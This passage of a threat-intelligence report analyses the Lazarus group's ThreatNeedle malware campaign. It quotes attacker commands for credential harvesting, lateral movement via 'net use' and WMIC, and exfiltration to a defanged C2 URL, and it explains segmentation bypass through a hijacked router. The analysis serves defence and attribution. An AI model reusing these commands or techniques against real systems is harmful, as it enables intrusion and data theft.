https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-300x176.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-1024x599.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-768x449.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-299x175.png 299w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-370x217.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-479x280.png 479w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-800x468.png 800w" sizes="auto, (max-width: 1239px) 100vw, 1239px" /></a></p> <p style="text-align: center"><strong><em>Decoy document</em></strong></p> <h2 id="malware-implants">Malware implants</h2> <p>Upon opening a malicious document and allowing the macro, the malware is dropped and proceeds to a multistage deployment procedure. The malware used in this campaign belongs to a known malware cluster we named ThreatNeedle. We attribute this malware family to the advanced version of Manuscrypt (a.k.a. NukeSped), a family belonging to the Lazarus group. We previously observed the Lazarus group utilizing this cluster when attacking cryptocurrency businesses and a mobile game company. Although the malware involved and the entire infection process is known and has not changed dramatically compared to previous findings, the Lazarus group continued using ThreatNeedle malware aggressively in this campaign.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100815" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png" alt="" width="1504" height="514" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png 1504w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-300x103.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-1024x350.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-768x262.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-512x175.png 512w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-370x126.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-819x280.png 819w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07-800x273.png 800w" sizes="auto, (max-width: 1504px) 100vw, 1504px" /></a></p> <p style="text-align: center"><strong><em>Infection procedure</em></strong></p> <p>The payload created by the initial spear-phishing document loads the next stage as a backdoor running in-memory – the ThreatNeedle backdoor. ThreatNeedle offers functionality to control infected victims. The actor uses it to carry out initial reconnaissance and deploy additional malware for lateral movement. When moving laterally, the actor uses ThreatNeedle installer-type malware in the process. This installer is responsible for implanting the next stage loader-type malware and registering it for auto-execution in order to achieve persistence. The ThreatNeedle loader-type malware exists in several variations and serves the primary purpose of loading the final stage of the ThreatNeedle malware in-memory.</p> <h3 id="threatneedle-installer">ThreatNeedle installer</h3> <p>Upon launch, the malware decrypts an embedded string using RC4 (key: B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4) and compares it to &#8220;<em>7486513879852</em>&#8220;. If the user executes this malware without a command line parameter, the malware launches a legitimate calculator carrying a dark icon of the popular Avengers franchise.</p> <p>Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen. We&#8217;ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened.</p> <p>It then decrypts the embedded payload using the RC4 algorithm, saves it to an .xml extension with a randomly created five-character file name in the current directory and then copies it to the system folder with a .sys extension.</p> <p>This final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows service and launched. In addition, the malware saves the configuration data as a registry key encrypted in RC4:</p> <ul> <li>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig &#8211; Description</li> </ul> <h3 id="threatneedle-loader">ThreatNeedle loader</h3> <p>This component is responsible for loading the final backdoor payload into memory. In order to do this, the malware uses several techniques to decrypt its payload:</p> <ul> <li>Loading the payload from the registry.</li> <li>Loading the payload from itself after decrypting RC4 and decompression.</li> <li>Loading the payload from itself after decrypting AES and decompression.</li> <li>Loading the payload from itself after decompression.</li> <li>Loading the payload from itself after one-byte XORing.</li> </ul> <p>Most loader-style malware types check the command line parameter and only proceed with the malicious routine if an expected parameter is given. This is a common trait in ThreatNeedle loaders. The most common example we&#8217;ve seen is similar to the ThreatNeedle installer – the malware decrypts an embedded string using RC4, and compares it with the parameter &#8220;Sx6BrUk4v4rqBFBV&#8221; upon launch. If it matches, the malware begins decrypting its embedded payload using the same RC4 key. The decrypted payload is an archive file which is subsequently decompressed in the process. Eventually, the ThreatNeedle malware spawns in memory.</p> <p>The other variant of the loader is preparing the next stage payload from the victim&#8217;s registry. As we can see from the installer malware description, we suspect that the registry key was created by the installer component. Retrieved data from the registry is decrypted using RC4 and then decompressed. Eventually, it gets loaded into memory and the export function is invoked.</p> <h3 id="threatneedle-backdoor">ThreatNeedle backdoor</h3> <p>The final payload executed in memory is the actual ThreatNeedle backdoor. It has the following functionality to control infected victim machines:</p> <ul> <li>Manipulate files/directories</li> <li>System profiling</li> <li>Control backdoor processes</li> <li>Enter sleeping or hibernation mode</li> <li>Update backdoor configuration</li> <li>Execute received commands</li> </ul> <h2 id="post-exploitation-phase">Post-exploitation phase</h2> <p>From one of the hosts, we discovered that the actor executed a credential harvesting tool named <a href="https://github.com/lgandx/Responder/">Responder</a> and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under <em>&#8220;Overcoming network segmentation</em>&#8220;.</p> <p>Judging by the hosts that were infected with the ThreatNeedle backdoors post-exploitation, we speculate that the primary intention of this attack is to steal intellectual property. Lastly, the stolen data gets exfiltrated using a custom tool that will be described in the &#8220;<em>Exfiltration&#8221;</em> section. Below is a rough timeline of the compromise we investigated:</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100816" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08.png" alt="" width="1600" height="856" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-300x161.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-1024x548.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-768x411.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-1536x822.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-327x175.png 327w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-370x198.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-523x280.png 523w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145219/lazarus_threatneedle_08-800x428.png 800w" sizes="auto, (max-width: 1600px) 100vw, 1600px" /></a></p> <p style="text-align: center"><strong><em>Timeline of infected hosts</em></strong></p> <h3 id="credential-gathering">Credential gathering</h3> <p>During the investigation we discovered that the Responder tool was executed from one of the victim machines that had received the spear-phishing document. One day after the initial infection, the malware operator placed the tool onto this host and executed it using the following command:</p> <ul> <li>[Responder file path] -i [IP address] -rPv</li> </ul> <p>Several days later, the attacker started to move laterally originating from this host. Therefore, we assess that the attacker succeeded in acquiring login credentials from this host and started using them for further malicious activity.</p> <h3 id="lateral-movement">Lateral movement</h3> <p>After acquiring the login credentials, the actor started to move laterally from workstations to server hosts. Typical lateral movement methods were employed, using Windows commands. First, a network connection with a remote host was established using the command &#8220;net use&#8221;.</p> <ul> <li>net use \\<em>[IP address]</em>\IPC$ &#8220;<em>[password]</em>&#8221; /u:&#8221;[user name]&#8221; &gt; $temp\~tmp5936t.tmp 2&gt;&amp;1&#8243;</li> </ul> <p>Next, the actor copied malware to the remote host using the Windows Management Instrumentation Command-line (WMIC).</p> <ul> <li>exe /node:[IP address] /user:&#8221;[user name]&#8221; /password:&#8221;[password]&#8221; PROCESS CALL CREATE &#8220;<strong>cmd.exe /c $appdata\Adobe\adobe.bat</strong>&#8220;</li> <li>exe /node:[IP address] /user:&#8221;[user name]&#8221; /password:&#8221;[password]&#8221; PROCESS CALL CREATE &#8220;<strong>cmd /c sc queryex helpsvc &gt; $temp\tmp001.dat</strong>&#8220;</li> </ul> <h3 id="overcoming-network-segmentation">Overcoming network segmentation</h3> <p>In the course of this research, we identified another highly interesting technique used by the attackers for lateral movement and exfiltration of stolen data. The enterprise network under attack was divided into two segments: corporate (a network on which computers had internet access) and restricted (a network on which computers hosted sensitive data and had no internet access). According to corporate policies, no transfer of information was allowed between these two segments. In other words, the two segments were meant to be completely separated.</p> <p>Initially, the attackers were able to get access to systems with internet access and spent a long time distributing malware between machines in the network&#8217;s corporate segment. Among the compromised machines were those used by the administrators of the enterprise&#8217;s IT infrastructure.</p> <p>It is worth noting that the administrators could connect both to the corporate and the restricted network segments to maintain systems and provide users with technical support in both zones. As a result, by gaining control of administrator workstations the attackers were able to access the restricted network segment.</p> <p>However, since directly routing traffic between the segments was not possible, the attackers couldn&#8217;t use their standard malware set to exfiltrate data from the restricted segment to the C2.</p> <p>The situation changed on July 2 when the attackers managed to obtain the credentials for the router used by the administrators to connect to systems in both segments. The router was a virtual machine running CentOS to route traffic between several network interfaces based on predefined rules.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-1024x406.png" alt="" width="1024" height="406" class="aligncenter size-large wp-image-100975" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-1024x406.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-300x119.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-768x305.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-441x175.png 441w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-370x147.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-706x280.png 706w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09-800x317.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09.png 1270w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></a></p> <p style="text-align: center"><strong><em>Connection layout between victim&#8217;s network segments</em></strong></p> <p>According to the evidence collected, the attackers scanned the router&#8217;s ports and detected a <a href="https://www.webmin.com/">Webmin</a> interface. Next, the attackers logged in to the web interface using a privileged root account. It&#8217;s unknown how the attackers were able to obtain the credentials for that account, but it&#8217;s possible the credentials were saved in one of the infected system&#8217;s browser password managers.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100818" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10.png" alt="" width="1404" height="245" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10.png 1404w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-300x52.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-1024x179.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-768x134.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-1003x175.png 1003w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-370x65.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145349/lazarus_threatneedle_10-800x140.png 800w" sizes="auto, (max-width: 1404px) 100vw, 1404px" /></a></p> <p style="text-align: center"><strong><em>Log listing Webmin web interface logins</em></strong></p> <p>By gaining access to the configuration panel the attackers configured the Apache web server and started using the router as a proxy server between the organization&#8217;s corporate and restricted segments.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100819" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11.png" alt="" width="868" height="260" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11.png 868w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11-300x90.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11-768x230.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11-584x175.png 584w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11-370x111.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145420/lazarus_threatneedle_11-800x240.png 800w" sizes="auto, (max-width: 868px) 100vw, 868px" /></a></p> <p style="text-align: center"><strong><em>List of services used on the router</em></strong></p> <p>Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy <a href="https://www.ssh.com/ssh/putty/putty-manuals/0.68/Chapter5.html">PSCP</a> (the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. In addition, malware running in the network&#8217;s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-1024x443.png" alt="" width="1024" height="443" class="aligncenter size-large wp-image-100977" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-1024x443.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-300x130.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-768x332.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-404x175.png 404w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-370x160.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-647x280.png 647w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12-800x346.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12.png 1289w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></a></p> <p style="text-align: center"><strong><em>New connection layout after attacker&#8217;s intrusion</em></strong></p> <p>In the course of the investigation we identified malware samples with the hardcoded URL of the router used as a proxy server.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100820" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13.png" alt="" width="1031" height="87" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13.png 1031w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13-300x25.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13-1024x86.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13-768x65.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13-370x31.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145453/lazarus_threatneedle_13-800x68.png 800w" sizes="auto, (max-width: 1031px) 100vw, 1031px" /></a></p> <p style="text-align: center"><strong><em>Hardcoded proxy address in the malware</em></strong></p> <p>Since the attackers regularly deleted log files from the router, only a handful of commands entered to the command line via SSH could be recovered. An analysis of these commands shows that the attackers tried to reconfigure traffic routing using the route command.</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145548/lazarus_threatneedle_14.png" class="magnificImage"><img loading="lazy" decoding="async" style="text-align: center" class="size-full wp-image-100822 aligncenter" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145548/lazarus_threatneedle_14.png" alt="" width="499" height="156" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145548/lazarus_threatneedle_14.png 499w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145548/lazarus_threatneedle_14-300x94.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145548/lazarus_threatneedle_14-370x116.png 370w" sizes="auto, (max-width: 499px) 100vw, 499px" /></a></p> <p style="text-align: center"><strong><em>Attacker commands</em></strong></p> <p>The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of their activity from the router, using the logrotate utility to set up automatic deletion of log files.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100823" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15.png" alt="" width="918" height="99" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15.png 918w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15-300x32.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15-768x83.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15-370x40.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145608/lazarus_threatneedle_15-800x86.png 800w" sizes="auto, (max-width: 918px) 100vw, 918px" /></a></p> <p style="text-align: center"><strong><em>Webmin log</em></strong></p> <h3 id="exfiltration">Exfiltration</h3> <p>We observed that the malware operator attempted to create SSH tunnels to a remote server located in South Korea from several compromised server hosts. They used a custom tunneling tool to achieve this. The tool receives four parameters: client IP address, client port, server IP address and server port. The tool offers basic functionality, forwarding client traffic to the server. In order to create a covert channel, the malware encrypts forwarded traffic using trivial binary encryption.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100824" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16.png" alt="" width="920" height="316" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16.png 920w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-300x103.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-768x264.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-509x175.png 509w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-370x127.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-815x280.png 815w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145640/lazarus_threatneedle_16-800x275.png 800w" sizes="auto, (max-width: 920px) 100vw, 920px" /></a></p> <p style="text-align: center"><strong><em>Encryption routine</em></strong></p> <p>Using the covert channel, the adversary copied data from the remote server over to the host using the PuTTy PSCP tool:</p> <ul> <li>%APPDATA%\PBL\unpack.tmp  -pw <em>[password]</em> root@<em>[IP address]</em>:/tmp/cab0215 %APPDATA%\PBL\cab0215.tmp</li> </ul> <p>After copying data from the server, the actor utilized the custom tool to exfiltrate stolen data to the remote server. This malware looks like a legitimate VNC client and runs like one if it&#8217;s executed without any command line parameters.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100825" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17.png" alt="" width="924" height="664" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17.png 924w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-300x216.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-768x552.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-244x175.png 244w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-370x266.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-390x280.png 390w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145717/lazarus_threatneedle_17-800x575.png 800w" sizes="auto, (max-width: 924px) 100vw, 924px" /></a></p> <p style="text-align: center"><strong><em>Execution of malware without parameters</em></strong></p> <p>However, if this application is executed with specific command line parameters, it runs an alternate, malicious function. According to our telemetry, the actor executed this application with six parameters:</p> <ul> <li><em>%APPDATA%\Comms\Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp %APPDATA%\Comms\cab59.tmp FL0509 15000</em></li> </ul> <p>Also, if the number of command line parameters is greater than six, the malware jumps into a malicious routine. The malware also checks the length of the second argument – if it&#8217;s less than 29 characters, it terminates the execution. When the parameter checking procedure has passed successfully, the malware starts to decrypt its next payload.</p> <p>The embedded payload gets decrypted via XOR, where each byte from the end of the payload gets applied to the preceding byte. Next, the XORed blob receives the second command line argument that&#8217;s provided (in this case S0RMM-50QQE-F65DN-DCPYN-5QEQA). The malware can accept more command line arguments, and depending on its number it runs differently. For example, it can also receive proxy server addresses with the &#8220;-p&#8221; option.</p> <p>When the decrypted in-memory payload is executed, it compares the header of the configuration data passed with the string &#8220;0x8406&#8221; in order to confirm its validity. The payload opens a given file (in this example %APPDATA%\Comms\cab59.tmp) and starts exfiltrating it to the remote server. When the malware uploads data to the C2 server, it uses HTTP POST requests with two parameters named &#8216;fr&#8217; and &#8216;fp&#8217;:</p> <ul> <li>The &#8216;fr&#8217; parameter contains the file name from the command line argument to upload.</li> <li>The &#8216;fp&#8217; parameter contains the base64 encoded size, CRC32 value of content and file contents.</li> </ul> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100826" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18.png" alt="" width="1558" height="131" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18.png 1558w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-300x25.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-1024x86.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-768x65.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-1536x129.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-1030x87.png 1030w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-370x31.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145751/lazarus_threatneedle_18-800x67.png 800w" sizes="auto, (max-width: 1558px) 100vw, 1558px" /></a></p> <p style="text-align: center"><strong><em>Contents of fp parameter</em></strong></p> <h2 id="attribution">Attribution</h2> <p>We have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group. During this investigation, we were able to find connections to several clusters of the Lazarus group.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100827" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png" alt="" width="1474" height="884" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png 1474w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-300x180.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-1024x614.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-768x461.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-292x175.png 292w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-370x222.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-467x280.png 467w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19-800x480.png 800w" sizes="auto, (max-width: 1474px) 100vw, 1474px" /></a></p> <p style="text-align: center"><strong><em>Connections between Lazarus campaigns</em></strong></p> <h3 id="connection-with-deathnote-cluster">Connection with DeathNote cluster</h3> <p>During this investigation we identified several connections with the DeathNote (a.k.a. <a href="https://www.clearskysec.com/operation-dream-job/">Operation Dream Job</a>) cluster of the Lazarus group. First of all, among the hosts infected by the ThreatNeedle malware, we discovered one that was also infected with the DeathNote malware, and both threats used the same C2 server URLs.</p> <p>In addition, while analyzing the C2 server used in this attack, we found a custom web shell script that was also discovered on the DeathNote C2 server. We also identified that the server script corresponding to the <em>Trojanized VNC Uploader</em> was found on the DeathNote C2 server.</p> <p>Although DeathNote and this incident show different TTPs, both campaigns share command and control infrastructure and some victimology.</p> <h3 id="connection-with-operation-applejeus">Connection with Operation AppleJeus</h3> <p>We also found a connection with <a href="https://securelist.com/operation-applejeus/87553/">Operation AppleJeus</a>. As we described, the actor used a homemade tunneling tool in the ThreatNeedle campaign that has a custom encryption routine to create a covert channel. This very same tool was utilized in operation AppleJeus as well.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100828" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20.png" alt="" width="1774" height="348" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145858/lazarus_threatneedle_20.png 1774w, 